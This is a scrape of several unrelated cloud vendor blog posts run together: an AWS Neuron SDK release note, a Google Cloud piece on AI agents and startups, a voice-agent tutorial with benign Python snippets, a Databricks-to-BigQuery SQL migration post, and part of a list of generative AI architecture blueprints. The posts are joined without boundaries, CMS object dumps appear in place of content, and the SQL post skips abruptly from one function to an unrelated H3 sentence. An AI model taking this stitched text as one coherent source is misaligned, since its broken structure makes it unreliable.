Today, AWS announces the general availability of Neuron SDK 2.25.0, delivering improvements for inference workloads and performance monitoring on AWS Inferentia and Trainium instances. This latest release adds context and data parallelism support as well as chunked attention for long sequence processing in inference, and updates the neuron-ls and neuron-monitor APIs with more information on node affinities and device utilization, respectively.
This release also introduces automatic aliasing (Beta) for fast tensor operations, and adds improvements for disaggregated serving (Beta). Finally, it provides upgraded AMIs and Deep Learning Containers for inference and training workloads on Neuron.
Neuron 2.25.0 is available in all AWS Regions where Inferentia and Trainium instances are offered.
To learn more and for a full list of new features and enhancements, see:
Startups are at the forefront of generative AI development, pushing current capabilities and unlocking new potential. Building on our Future of AI: Perspectives for Startups 2025 report, several of the AI industry leaders featured in the report joined Jason Calacanis on the “This Week in Startups” podcast’s Startup Basics series, offering their perspective on what’s next for AI.
Memory, multi-agent systems, better UX
Harrison Chase, CEO and co-founder of LangChain, spoke to the impact memory will have on agent continuity, particularly when it comes to contextual knowledge. As memory becomes more common, agents will gain experience (rather than just instructions) on how companies and team members work through feedback, preferences, and more natural subsequent adaptations, enabling deeply personalized interactions. As Jia Li, president of LiveX AI noted, ‘What the users truly appreciate is when AI agents understand their needs and are thinking from their point of view”.
Another exciting prospect is multi-agent collaboration, Chase said, since most AI systems still work in isolation. As agents increasingly collaborate with each other, task management, information sharing, and even delegation of duties in accordance with agent specializations will allow agents to become more efficient and reduce cognitive load for their users. This vision goes beyond simple queries, Yoav Shoham, co-founder of AI21 Labs, explained: “Typically when we speak about agents, what we have in mind is a system that’s not a transactional call to an LLM. The agent can be proactive, it executes complicated flows using multiple tools.”
That’s why Google launched a new, open protocol called Agent2Agent (A2A) — to help AI agents communicate with each other, securely exchange information, and coordinate actions on top of various enterprise platforms or applications. The A2A effort signifies a shared vision of a future when AI agents, regardless of their underlying technologies, can collaborate to automate complex enterprise workflows, to drive new levels of efficiency and innovation. We believe the A2A framework will add significant value for customers, allowing AI agents to work across their entire application estates.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e319176c070>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Building trust in a world of autonomous AI
On the topic of multi-agent collaboration, Saurabh Tiwary, VP and GM of Cloud AI at Google, discussed how AI agents are moving beyond simple chat interfaces. He explained that today’s AI agents are designed for indeterminate tasks, and are capable of taking actions, observing outputs, and dynamically determining subsequent steps. This advanced functionality paves the way for agents to manage complex workflows such as autonomously handling emails, identifying critical tasks, and even delegating responsibilities across teams. But for this future to become reality, Saurabh underscored the need for agents to deliver high-quality output, to foster user trust and encourage the delegation of important tasks. Echoing this, LiveX AI’s Jia Li said “we believe humanlike AI agents can create that empathy and trust between consumers and the AI agent.”
At Google, we’re addressing the need for agents to work across diverse environments by offering Agent Development Kit (ADK) and the A2A protocol as open-source.
We recently donated A2A to the Linux Foundation, establishing an open governance body for the protocol. This critical step will help A2A evolve as a universal standard, fostering interoperability between agents built on any platform or using any underlying technology — not just Google’s ADK. With support from over 120 partners, including major hyperscalers like Microsoft and Amazon, this standardization allows for a future where diverse, specialized AI agents can communicate, securely exchange information, and coordinate actions across a business’s entire application ecosystem.
AI21 Lab’s Yoav Shoham pointed out that for agents to collaborate across different organizations, the fundamental hurdle of ‘semantics’ and ‘shared incentives’ must be overcome. This means that while A2A protocols may specify the syntax of communication, they do not guarantee a shared understanding of the meaning (semantics) of the information being exchanged, and agents from different organizations could have distinct or even conflicting goals, making for misaligned incentives. This presents an opportunity for startups to innovate by designing sophisticated game theory-based protocols, robust governance frameworks, and control mechanisms that ensure agents ‘play nice together’, even when their objectives differ.
Infrastructure performance is booming
At the same time, infrastructure performance is exploding at levels Amin Vahdat, Vice President for the AI and Infrastructure team at Google Cloud, has never seen before. “It’s not uncommon for us at Google to make things twice as fast in three months, and then we do it again three months later, and three months after that, and all of a sudden you have 10X or 20X performance improvements,” said Vahdat on the podcast.
“Twelve months ago, models sometimes struggled to count the number of ‘r’s’ in the word ‘strawberry,’ but today they are writing and executing code”, Vahdat said.
These improvements to model efficiency and performance have shifted the focus away from training and building models toward serving the models and maximizing their utility. Vahdat refers to 2025 as “the year of inference.”
At Google Cloud Next this April, we introduced our new, seventh-generation Tensor Processing Unit (TPU) called Ironwood, our first TPU specifically designed for inference. Ironwood dramatically improved performance while also improving power efficiency, meaning lower costs and greater workload capacity — all necessities to fuel the age of inference.
The growth of nimble startup teams
The way AI can augment and amplify human capabilities and efficiency extends well beyond the engineering team, touching every employee in a modern business.
AI can improve “every job, every function, every workflow,” offering “incredible leverage,” said David Friedberg, CEO of Ohalo Genetics. For example, you can use AI to scan and score hundreds of job resumes in just a couple of hours, a task that previously took days, or to generate comprehensive project plans in hours instead of weeks or months.
This efficiency means smaller, more nimble teams can achieve results that historically required much larger organizations. “We’ve really just shrunk the amount of time it takes to get from idea to testing and seeing if there’s value,” said Jill Chase, Partner at CapitalG. “That is the most powerful thing for startups.” This has grown startups’ addressable economic opportunities, allowing organizations with 100-200 people to pursue “deep tech” or technically difficult objectives that used to be the realm of thousand-plus-person companies. Companies leveraging AI gain significantly more “shots on goal.”
During Google I/O 2025 we highlighted major advancements in this area, emphasizing development with Gemini 2.5:
Google AI Studio, powered by Gemini, offers the fastest way for developers to evaluate models and begin building with the Gemini API. It integrates Gemini 2.5 Pro directly into the native code editor, streamlining the prototyping process. Using the Gen AI SDK, developers can instantly generate web applications from simple text, image, or video prompts.
Accessible via the Gemini API and new tools like URL Context, Gemini 2.5’s advanced reasoning capabilities allow the model to pull information from web pages, helping developers create agentic experiences. Furthermore, Gemini 2.5 Flash Native Audio, available in the Live API, can create agentic applications for speaking and listening in 24 languages with customizable voice and style. That means more natural back-and-forth conversations, with better flow and fewer extraneous sounds.
Colab’s agent-first experience, powered by Gemini 2.5 Flash, can help developers with complex tasks like fine-tuning models and building UIs, significantly reducing coding time. These tools make building faster, easier, and more efficient, so developers can focus on bringing their ideas to life.
Empowering startups to innovate more with less
At Google Cloud, we’re deeply committed to fostering innovation, providing not only cutting-edge tools and infrastructure, but also essential resources and expertise to help startups leverage AI effectively. No matter where you are with AI adoption, we’re here to help: Book your generative AI consultation today, get up to $350,000 USD in cloud credits with the Google for Startups Cloud Program, or contact our Startup team.
For more comprehensive insights into the future of AI and how Google Cloud can accelerate your startup’s growth, download the Future of AI: Perspectives for Startups 2025 report today.
Building advanced conversational AI has moved well beyond text.
Now, we can use AI to create real-time, voice-driven agents. However, these systems need low-latency, two-way communication, real-time information retrieval, and the ability to handle complex tasks. This guide shows you how to build one using Gemini and the Google Agent Development Kit (ADK). You’ll learn how to create an intelligent, responsive voice agent.
The foundational agent
First, we create an agent with a persona but no access to external tools. This is the simplest agent, relying only on its pre-trained knowledge. It’s a great starting point.
code_block
<ListValue: [StructValue([(‘code’, ‘# In app/server/streaming_service.pyrnfrom google.adk.agents import Agentrnfrom core_utils import MODEL, SYSTEM_INSTRUCTIONrnrnself.agent = Agent(rn name=”voice_assistant_agent”,rn model=MODEL,rn instruction=SYSTEM_INSTRUCTION,rn # The ‘tools’ list is omitted for now.rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385be0>)])]>
This agent can chat, but it lacks access to external information.
The advanced agent
To make the agent useful, we add tools. This lets the agent access live data and services. In streaming_service.py, we give the agent access to Google Search and Google Maps.
Google Search: This pre-built ADK tool lets your agent perform Google searches to answer questions about current events and real-time information.
MCP Toolset for Google Maps: This uses the Model Context Protocol (MCP) to connect your agent to a specialized server (in this case, one that understands the Google Maps API). The main agent acts as an orchestrator, delegating tasks it can’t handle to specialist tools.
Engineering a natural conversation
The RunConfig object defines how the agent communicates. It controls aspects like voice selection and streaming mode.
StreamingMode.BIDI (bi-directional) enables users to interrupt the agent, creating a more natural conversation.
The asynchronous core
Real-time voice chats require handling multiple tasks concurrently: listening, thinking, and speaking. Python’s asyncio and TaskGroup manage these parallel tasks.
code_block
<ListValue: [StructValue([(‘code’, ‘# In app/server/streaming_service.py (inside the handle_stream method)rnimport asynciornasync with asyncio.TaskGroup() as tg:rn # Task 1: Listens for audio from the user’s browser.rn tg.create_task(receive_client_messages(), name=”ClientMessageReceiver”)rn # Task 2: Forwards audio to the Gemini service.rn tg.create_task(send_audio_to_service(), name=”AudioSender”)rn # Task 3: Listens for responses from Gemini.rn tg.create_task(receive_service_responses(), name=”ServiceResponseReceiver”)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e31943857f0>)])]>
Translating the agent’s voice
The receive_service_responses task processes the agent’s output before sending it to the user. This output includes audio and text transcription.
Handling audio
Audio is handled using Base64 encoding to convert binary data into a text string for transmission.
code_block
<ListValue: [StructValue([(‘code’, ‘# — Inside receive_service_responses —rnimport base64rnimport jsonrn# Handling Audio Responsernif hasattr(part, “inline_data”) and part.inline_data:rn # Encode the raw audio bytes into a Base64 text string.rn b64_audio = base64.b64encode(part.inline_data.data).decode(“utf-8”)rn # Package it in a JSON message, typed as “audio”.rn await websocket.send(json.dumps({“type”: “audio”, “data”: b64_audio}))’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385730>)])]>
Handling text
Text transcription is streamed for real-time feedback.
code_block
<ListValue: [StructValue([(‘code’, ‘# — Inside receive_service_responses —rn# Handling Text Responsernif hasattr(part, “text”) and part.text:rn # Check if the text is a partial thought.rn event_str = str(event)rn # Check if the text is a streaming, partial thought.rn if “partial=True” in event_str:rn # Send it for real-time display on the client.rn await websocket.send(json.dumps({“type”: “text”, “data”: part.text}))’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385e20>)])]>
As data platforms evolve and businesses diversify their cloud ecosystems, the need to migrate SQL workloads between engines is becoming increasingly common. Recently, I had the opportunity to work on translating a set of Databricks SQL queries to BigQuery SQL — a task that is deceptively complex due to differences in syntax, functions, and execution behavior.
To streamline the process, we turned to Google Gemini, a powerful AI assistant, to help bridge the gap between the two SQL dialects. In this blog post, I’ll walk you through the process, challenges we faced, how Gemini helped, and key takeaways from the experience.
The translation tightrope: Why it’s tricky
To boost operational efficiency and cut costs, we migrate analytics workloads from Databricks SQL (on Delta Lake tables) to Google BigQuery. This required rewriting numerous queries, from simple aggregations to intricate CTEs and window functions.
Databricks, with its powerful Spark SQL capabilities, and BigQuery, a serverless and highly scalable data warehouse, are both titans in the data world. However, their SQL dialects, while sharing common ANSI SQL foundations, have distinct variations. Translating between the two manually was possible, but would have been time-consuming and error-prone. This is where Google Gemini played a crucial role.
Below are some of the data type mappings between Databricks and Bigquery :
Category
Databricks SQL Data Type
BigQuery SQL Data Type
Description
Integer Types
TINYINT
INT64
8-bit integer
SMALLINT
INT64
16-bit integer
INT or INTEGER
INT64
32-bit integer
BIGINT
INT64
64-bit integer
Floating-Point Types
FLOAT or REAL
FLOAT64
64-bit floating point
DOUBLE
FLOAT64
64-bit floating point (equivalent to BigQuery’s FLOAT64)
Decimal/Exact Types
DECIMAL or NUMERIC
NUMERIC or BIGNUMERIC
Fixed-point decimal with user-defined precision and scale. BigQuery has an extended BIGNUMERIC for larger precision.
Boolean Types
BOOLEAN
BOOL
True or False
String Types
STRING or VARCHAR
STRING
Variable-length string
CHAR
Not Supported
Fixed-length string is not directly supported in BigQuery; use STRING instead.
Date and Time Types
DATE
DATE
Calendar date (year, month, day)
TIMESTAMP
TIMESTAMP
Timestamp with time zone information
DATETIME
DATETIME
Timestamp without time zone
Syntax difference in Databricks and BigQuery
First_Value :
Databricks
code_block
<ListValue: [StructValue([(‘code’, ‘first_value(expr[, ignoreNull]) [FILTER ( WHERE cond ) ]’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3191b802e0>)])]>
Returns the polygonal boundary of the input H3 cell in WKT format.
Providing precise details for complex functions like these is crucial. In fact, we’ve found that by detailing these H3 translations, even advanced AI models like Gemini can generate more accurate and reliable BigQuery SQL from your original Databricks Spark SQL, ensuring your geospatial analyses remain intact.
Architecture overview
Before diving into the translation logic, let me show you how the pieces fit together.
Pipeline components
Source SQL Storage:
All original Databricks SQL files were stored in Google Cloud Storage .
Function mapping guide:
A curated guide that maps Databricks-specific SQL functions (e.g., First_value, UCase,etc) to their BigQuery equivalents (FIRST_VALUE, UPPER, TIMESTAMP etc.)
This guide included examples and syntax rules, which were used as input context for Gemini.
Few-shot examples:
I selected a set of hand-translated queries to serve as high-quality training prompts to improve Gemini’s consistency.
Retrieval-Augmented Generation (RAG) layer:
Before querying Gemini, I leveraged the Vertex AI RAG Engine to retrieve relevant function mappings and example translations. This ensured Gemini had grounded knowledge, improving the accuracy of the output. The RAG-enriched prompt was then sent to Gemini for translation, and the returned SQL was optionally post-processed to fix edge cases.
This ensured Gemini had grounded knowledge, improving the accuracy of the output.
Gemini API integration:
The RAG-enriched prompt was sent to Gemini for translation.
Returned SQL was optionally post-processed to fix edge cases.
Validation layer:
Translated SQL queries were validated by executing them in a BigQuery dry run mode to detect syntax issues.
Architecture diagram
Lessons learned
RAG + Gemini = Smart SQL translation: Grounding Gemini with real-world examples and mapping logic made it significantly more accurate.
A comprehensive function mapping guide is essential: Invest time in building a robust function mapping resource.
Thorough validation is the key: Use BigQuery’s dry run and information schema to ensure translated queries are safe and optimized.
Ready to streamline your SQL migrations?
Stop wrestling with SQL syntax and start leveraging the power of your data, wherever it resides. With the Gemini model, we can streamline your Databricks Spark SQL to BigQuery SQL translation process, making it faster, more reliable, and far less painful.
Dive in and accelerate your journey to cross-platform data success. Click on this link to get more details, and take it forward!
A little over a year ago, we published a list of generative AI use cases that has since grown to include more than 600 examples of how organizations are putting AI to work. Yet for many developers and business leaders, inspiration has given way to a more practical question: where do I start?
To help, we’ve created a technical complement to our most impactful, customer-inspired use cases. This guide contains 101 architectural blueprints as illustrative starting points to give you a practical foundation for your next project.
Each blueprint shows a design pattern and a corresponding Google Cloud tech stack to solve real-world challenges, from automating document summarization and forecasting sales, to improving patient outcomes and preventing fraud.
Let’s dive in.
The list is organized by 10 major industry groups.
These architectural blueprints are inspired by customers who are using AI in the retail industry such as Mercari, Target, Carrefour Taiwan, The Home Depot, Unilever, and more.
1. Unify online and in-store retail experiences
Business challenge: You’re a large retailer with valuable physical stores and a growing e-commerce channel. These two worlds operate in silos, creating a disconnected experience where customers face inconsistent pricing, promotions, and inventory levels.
Blueprint: Customer traffic hits your e-commerce site -> Cloud CDN caches static content for speed -> GKE scales containerized e-commerce microservices based on demand -> Apigee manages APIs for real-time inventory checks against store-level data -> All sales data streams into BigQuery for supply chain analytics and demand forecasting
2. Give your store managers ways to see real-time inventory
Business challenge: You want to boost efficiency by giving your store managers accurate, real-time inventory recommendations.
Tech stack: BigQuery, Vertex AI, Looker, Google Workspace.
Blueprint: Daily sales and inventory data from thousands of stores is ingested into BigQuery -> Vertex AI models process historical data to predict demand for each item -> Looker generates dashboards with recommended stock levels -> Recommendations are pushed to store associates’ devices, often via a simple interface like Google Sheets.
3. Make it easy for users to find and discover unique items on your online site
Business challenge: You have millions of unique, non-standard items needed to provide a highly relevant, fast, and personalized search experience for its users.
Tech stack: Google Cloud Storage, Dataflow, BigQuery, GKE.
Blueprint: A seller lists a new item, and its data is stored in Cloud Storage -> Dataflow processes item details and user interaction data in real-time -> This data enriches search indexes and feeds machine learning models running on GKE -> When a user searches, the models provide personalized rankings, which are served in milliseconds.
4. Modernize in-store operations with AI
Business challenge: You’re a retailer who needs to digitize and streamline legacy, paper-based processes for store associates to improve productivity and customer service.
Tech stack: Vertex AI Vision, GKE, Android, ChromeOS.
Blueprint: An associate uses a mobile device to scan a product shelf -> Vertex AI Vision analyzes the image to identify products and price tags -> An application, running on GKE, cross-references this with inventory data -> The device displays inventory status, ordering needs, or planogram compliance information.
5. Create an assistant for a better shopping experience
Business challenge: You’re a brand whose traditional support channels, like text-based chatbots and FAQs, feel impersonal, can’t visually guide customers through complex processes, and might not create a genuine connection with your audience.
Tech stack: Vertex AI, Google Cloud Storage (for 3D assets), GKE (for hosting and scaling), Speech-to-Text & Text-to-Speech APIs
Blueprint: A customer asks a troubleshooting question in your app (e.g., “How do I replace the water filter in my coffee machine?”). ➝ The request (voice or text) is sent to the conversational AI “brain” on Vertex AI, which identifies the intent. ➝ The AI generates a text response and identifies the corresponding visual aid (e.g., filter_replacement_step1.mp4). ➝ A service on GKE retrieves this video clip from Google Cloud Storage. ➝ The app displays the text and plays the short video, visually guiding the customer through the process and resolving their issue quickly.
6. Write differentiated product descriptions
Business challenge: You’re a large e-commerce retailer that needs to create unique, high-quality, and SEO-friendly product descriptions for thousands of items at scale, reducing manual effort and avoiding duplicate content.
Tech stack: Vertex AI, Cloud Run, BigQuery.
Blueprint: A merchandiser inputs key product attributes (e.g., material, color, target audience) into a product management tool -> These attributes are sent to a service on Cloud Run -> The service constructs a detailed prompt and calls the Vertex AI Generative AI API -> Vertex AI analyzes the attributes and returns multiple unique description options -> The descriptions are displayed to the merchandiser for review, editing, and final approval.
7. Help users find your products using photos as a reference
Business challenge: You want to make it easy for your customers to find desired inventory (e.g. clothing) using a photo as a reference.
Tech stack: Vertex AI Vision, Vector Search, Google Cloud Storage, Cloud Run.
Blueprint: A customer uploads a reference photo in the app -> The app sends the photo to a service on Cloud Run -> The service uses Vertex AI Vision to convert the photo into a vector embedding -> This embedding is used to query the Vector Search , which finds the most visually similar product embeddings from the indexed catalog -> The service returns the matching products to the customer in seconds.
8. Build a real-time product recommendation engine
Business challenge: You’re a digital retailer trying to increase basket size and customer loyalty. Traditional recommendation engines are too simplistic, often failing to understand a customer’s true intent or style beyond basic keywords. This leads to generic suggestions, poor discoverability for unique items in your catalog, and frustrated shoppers who abandon their carts, causing you to leave significant revenue on the table.
Blueprint: User clickstream data streams into Dataflow -> Dataflow processes and enriches these events, updating user profiles and embeddings in real-time (in BigQuery or a feature store) -> As a user browses, a request is sent to a service on Cloud Run -> The service queries Vector Search with the user’s embedding to find the most relevant or complementary items -> A personalized list of products is returned and displayed to the user in milliseconds.
9. Quickly identify trends and improve customer interactions
Business challenge: Your valuable feedback is buried in thousands of rows of unstructured text from surveys, reviews, and support tickets. Manually reading, tagging, and categorizing this data is a slow and tedious process that delays critical insights and prevents your team from quickly reacting to emerging trends or urgent issue
Tech stack: Google Sheets, Gemini for Google Workspace, Google Forms (as a data source).
Blueprint: Customer feedback is collected from sources like Google Forms and consolidated into a Google Sheet -> An analyst highlights the column of raw feedback and uses the integrated Gemini feature with a prompt like “Categorize this feedback” -> Gemini processes the text in each cell and populates a new column with the corresponding categories -> The analyst can then create charts and pivot tables on this newly structured data to identify trends.
10. Compare vendor proposals, right from your email
Business challenge: You’re a buyer or department head responsible for making purchasing decisions. But complex vendor proposals arrive in different formats, burying key details like costs, timelines, and deliverables across dozens of pages. Manually creating a comparison is slow, tedious, and prone to human error, creating the risk that you’ll miss a critical detail and make a costly decision.
Tech stack: Gmail, Gemini for Google Workspace.
Blueprint: A buyer receives multiple emails with vendor proposals as attachments (PDFs, Docs, etc.) -> In the Gmail thread, the user activates Gemini and provides a prompt like, “Create a table comparing the cost, timeline, and key deliverables from the attached proposals” -> Gemini reads the context of the emails and the content of the attachments -> It generates a concise summary and a comparison table directly in the Gmail interface -> The buyer can then make a faster, more informed decision without manually cross-referencing documents.
11. Merge and duplicate product listings
Business challenge: You’re an e-commerce catalog manager responsible for a massive product catalog sourced from multiple vendors. Inconsistent data creates countless duplicate listings for the same item. This clutters the customer experience, splits your inventory and sales data (making accurate forecasting impossible) and harms your search rankings, all while your team spends countless hours manually trying to find and merge them.
Tech stack: BigQuery, Vertex AI, Dataflow
Blueprint: Product catalog data is processed by a data processing pipeline (Dataflow)-> Dataflow calls a Vertex AI model to convert product text and images into vector embeddings -> The embeddings are stored in BigQuery -> A BigQuery ML clustering model groups items with similar embeddings into duplicate sets -> These duplicate sets are sent to a review dashboard or an automated merging service.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e54002643d0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
These architectural blueprints are inspired by customers who are using AI in the media, marketing, and gaming industry, such as: Formula E, The Golden State Warriors, Spotify, Warner Bros Discovery, and more.
12. Summarize commentary into podcasts
Business challenge: You’re a broadcaster or sports league with hours of live commentary for each event. Manually creating highlight reels, summaries, or daily podcasts is time-consuming, labor-intensive, and slow, causing you to miss opportunities for timely fan engagement.
Tech stack: Google Cloud Speech-to-Text, Vertex AI, Cloud Functions, and Google Cloud Storage.
Blueprint: Live audio commentary is captured and stored in Google Cloud Storage ➝ A Cloud Function is triggered, which sends the audio file to the Speech-to-Text API to generate a full, time-stamped transcript ➝ The transcript is sent to a Vertex AI generative model with a prompt like, “Identify the top 5 most exciting moments from this race transcript based on exclamation, keywords (e.g., ‘overtake’, ‘crash’), and sentiment. For each moment, create a 30-second summary script” ➝ The generated podcast script is then sent to a text-to-speech engine or a human host to be recorded, creating a “daily highlights” podcast in minutes instead of hours.
13. Build a content recommendation engine
Business challenge: You’re a sports franchise or media company that has consolidated all of its fan data into a unified data foundation. You want to deliver relevant, personalized content to every fan—including real-time game highlights, scores, and alerts about ticket sales or events—to deepen engagement and increase revenue.
Tech stack: BigQuery, Vertex AI Search, Vector Search, Dataflow, and Cloud Run.
Blueprint: Real-time fan interactions and game data (scores, stats) stream into Pub/Sub ➝ A Dataflow pipeline processes and enriches this data, updating fan profiles in the BigQuery unified data foundation ➝ Vertex AI uses this historical and real-time data to train a recommendation model ➝ When a fan uses the team’s app, a request is sent to a service on Cloud Run ➝ The service queries Vertex AI Vertex AI Search with the fan’s ID, which returns a personalized list of content (highlights, articles, ticket alerts) ➝ The app displays the personalized recommendations to the fan in real time.
14. Create ultra-personalized media campaigns
Business challenge: You want to move beyond generic marketing and create deeply personal, shareable moments for every single user.
Tech stack: BigQuery, Vertex AI, Dataflow, Cloud Run, and Google Cloud Storage.
Blueprint: A large-scale Dataflow pipeline processes a year’s worth of user interaction data from BigQuery to calculate personalized stats for each user ➝ For each user, a service on Cloud Run sends their top stats (e.g., favorite artist, most-played song) to the Gemini API with a prompt like, “Generate a fun, upbeat script for a podcast summarizing these listening habits” ➝ The Cloud Run service uses the generated text to create personalized assets (audio clips, social media images) and stores them in Google Cloud Storage ➝ When the user opens their app, it fetches their unique, pre-generated assets from Cloud Storage to deliver their personalized experience.
15. Build an AI captioning tool
Business challenge: You’re a major media company with a massive archive of video content. Your challenge is making this content accessible and searchable by creating accurate, time-stamped captions and transcripts, a process that is incredibly slow and expensive to do manually.
Blueprint: A video file is uploaded to Google Cloud Storage. ➝ A Cloud Function triggers and sends the video’s audio track to the Speech-to-Text API, specifying a model trained for media content. ➝ The API returns a detailed, time-stamped transcript. ➝ For added context, the transcript can be sent to a Gemini model with a prompt like, “Identify the different speakers in this transcript and label their lines,” providing a rich, searchable, and accessible caption file.
16. Write social media captions
Business challenge: You’re a sports league or broadcaster with hours of event footage. Your challenge is quickly creating engaging social media clips to capitalize on exciting moments, a process that requires a social media manager to manually watch footage, select a clip, and write a caption.
Tech stack: Gemini for Google Drive, Google Drive.
Blueprint: All broadcast footage from an event is saved to a shared folder in Google Drive. ➝ A social media manager opens the Gemini in Drive side panel. ➝ They use a prompt like, “Analyze the video files in this folder from the last hour. Find the top 3 most exciting moments based on commentary and crowd noise. For each, suggest a 5-second video clip and write three different engaging social media captions with relevant hashtags.” ➝ Gemini provides the clips and captions directly in the Drive interface, turning an hours-long task into a single prompt.
17. Create hundreds of hyper-personalized video and audio ad variations in minutes
Business challenge: You’re a digital advertising platform, and your clients want to move beyond one-size-fits-all ads. Your challenge is creating hundreds of personalized ad variations tailored to different audiences, a task that is prohibitively expensive and slow using traditional production methods.
Blueprint: An advertiser defines a campaign with multiple target audience segments stored in BigQuery (e.g., “young professionals,” “college students”). ➝ For each segment, a service on Cloud Run calls the Gemini API with a prompt like, “Generate a 15-second audio ad script for a new coffee brand, targeting ‘young professionals’. The tone should be sophisticated and energetic.” ➝ Gemini generates a unique script for each audience. ➝ The scripts are sent to the Text-to-Speech API to create audio voiceovers in various styles. ➝ These audio files are combined with background music, creating hundreds of personalized ad variations in minutes.
18. Gen AI photo-editing and design
Business challenge: You’re a franchise business and you need to create high-quality, professional marketing materials for hundreds of local branches. Your challenge is that local owners are not graphic designers, and hiring designers for every local ad is not scalable.
Tech stack: Vertex AI, Google Cloud Storage, a custom marketing portal (built on App Engine or Cloud Run).
Blueprint: A local studio owner logs into a central marketing portal. ➝ They upload a photo of their students to Google Cloud Storage. ➝ The portal provides an editing interface powered by Imagen 3, Google’s image generation model. ➝ The owner can use simple prompts like, “Extend the background of this photo to fit a vertical social media post,” or “Create a dynamic ‘new student special’ graphic using this photo.” ➝ The AI generates professional-quality, on-brand marketing assets, empowering local franchises to create their own materials without design expertise
19. Search data across tens of thousands of courses
Business challenge: You’re a large media or education company with tens of thousands of courses, articles, and learning materials. Your challenge is helping users find the specific information they need when it’s buried across this massive and diverse content library.
Tech stack: Vertex AI Search, BigQuery, Google Cloud Storage.
Blueprint: All course content, including text, videos, and metadata, is indexed from sources like Google Cloud Storage and BigQuery into Vertex AI Search. ➝ A user goes to the learning platform and uses a natural language search query like, “I want to learn about the basics of financial modeling in spreadsheets, but I only have 30 minutes.” ➝ Vertex AI Search understands the multiple intents (topic, format, duration) and queries across the entire catalog. ➝ It returns a ranked list of the most relevant results, such as a specific 10-minute video lecture and a 20-minute practical exercise, providing a much more relevant result than a simple keyword search.
20. Make video content generation faster
Business challenge: You’re a company creating AI-powered video content, such as digital avatars or automated news reports. Your challenge is the immense computational power required to render high-quality video quickly, which can create a bottleneck and slow down your entire production pipeline.
Tech stack: Cloud GPUs (or TPUs), Google Kubernetes Engine (GKE), Google Cloud Storage.
Blueprint: A user submits a script and selects a digital avatar for a new video. ➝ The request is sent to a rendering application running on a GKE cluster. ➝ GKE automatically scales up a pool of nodes equipped with powerful Cloud GPUs. ➝ The GPUs work in parallel to process the AI models and render the video frames at high speed. ➝ Once rendering is complete, the final video file is saved to Google Cloud Storage, and the GPU-powered nodes scale down automatically, optimizing for both speed and cost.
21. Create a recommendations experience
Business challenge: You’re a major broadcaster with a huge catalog of content, from live sports to soap operas. Your challenge is to keep viewers engaged by surfacing content that is personally relevant to them from across your entire diverse portfolio, rather than just showing them what’s popular.
Blueprint: Real-time viewer interaction data streams into a Dataflow pipeline, which processes the events and updates viewer profiles in BigQuery. ➝ The unified viewer data in BigQuery is used to train a Vertex AI Vertex AI Search model. ➝ When a viewer opens the streaming app, a request is sent to a service on Cloud Run. ➝ The service queries the Vertex AI Search model with the viewer’s ID. ➝ The model returns a personalized list of content, such as “Because you watched the soccer match, you might also like this sports documentary,” creating a highly engaging and personalized experience.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3e5408962100>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
These architectural blueprints are inspired by customers who are using AI in the automotive and logistics industry, such as: Volkswagen of America, PODS, Uber, UPS, BMW Group, and more.
22. Build an AI-powered interactive owner’s manual
Business challenge: You’re an automaker or manufacturer of complex products. Your challenge is that traditional paper owner’s manuals are cumbersome, difficult to search, and rarely used by customers, leading to frustration and increased calls to support centers for simple questions.
Tech stack: Vertex AI, AlloyDB for PostgreSQL, Cloud Run, Google Cloud Storage
Blueprint: All owner’s manual content is processed and chunked into vector embeddings, which are stored in AlloyDB. ➝ When a driver uses the app to ask a question like, “How do I change a flat tire?” , and the query is sent to a service on Cloud Run. ➝ For multimodal queries, the user points their phone’s camera at a dashboard light; the image is sent to Vertex AI Vision to identify it, and this information is added to the query. ➝ The service finds the most relevant manual sections from AlloyDB and sends them, along with the user’s question, to Gemini, which generates a clear, conversational answer.
23. Monitor real-time audio for in-transit safety alerts
Business challenge: You’re a transportation or logistics company responsible for the safety of thousands of drivers and passengers every day. Your challenge is reacting to dangerous situations quickly enough, as traditional methods rely on passengers or drivers manually triggering an alarm, which is often too late.
Blueprint: During a trip, audio from the vehicle is streamed in chunks to Pub/Sub. ➝ A Cloud Function is triggered, which sends the audio snippet to the Speech-to-Text API for transcription. ➝ The resulting text is sent to a Gemini model with a prompt like, “Analyze this text for keywords related to distress or hostility (‘robbery’, ‘help’). Return a ‘Red’ alert if found, otherwise ‘Green’.” ➝ If a ‘Red’ alert is returned, the system automatically notifies a central security dashboard with the trip details and vehicle location.
24. Deploy dynamic, location-aware digital advertising
Business challenge: Your company has a large mobile physical presence (like a fleet of trucks) and you want to move beyond displaying static logos. Your challenge is creating advertising that is hyper-relevant and context-aware, to capture the attention of people in specific neighborhoods with unique messaging.
Blueprint: A device on a truck periodically sends its GPS coordinates to a service on Cloud Run. ➝ The service calls the Google Maps Geocoding API to identify the current neighborhood and queries BigQuery for demographic or local interest data associated with that area. ➝ These details are used to construct a prompt for Gemini, such as “Create a witty, 10-word billboard headline for a moving company in a neighborhood known for its young families and parks.” ➝ Gemini returns multiple headline options, and the service displays the best one on the truck’s digital billboard in real time.
25. Build a productivity agent for customer service teams
Business challenge: You’re a large enterprise with a customer service team that handles thousands of interactions daily. Your agents spend significant time writing summaries instead of focusing on high-quality problem-solving.
Tech stack: Vertex AI, BigQuery, Cloud Functions
Blueprint: All customer service interactions (chats, emails) are stored in a central data store like BigQuery. ➝ When an agent opens a new ticket, a Cloud Function is triggered. ➝ The function retrieves the customer’s entire interaction history from BigQuery and sends it to Gemini with a prompt like, “Summarize the key issues from this customer’s past 5 interactions and list their current sentiment.” ➝ The concise summary appears directly in the agent’s CRM, allowing them to understand the full context in seconds and provide a more effective and empathetic response.
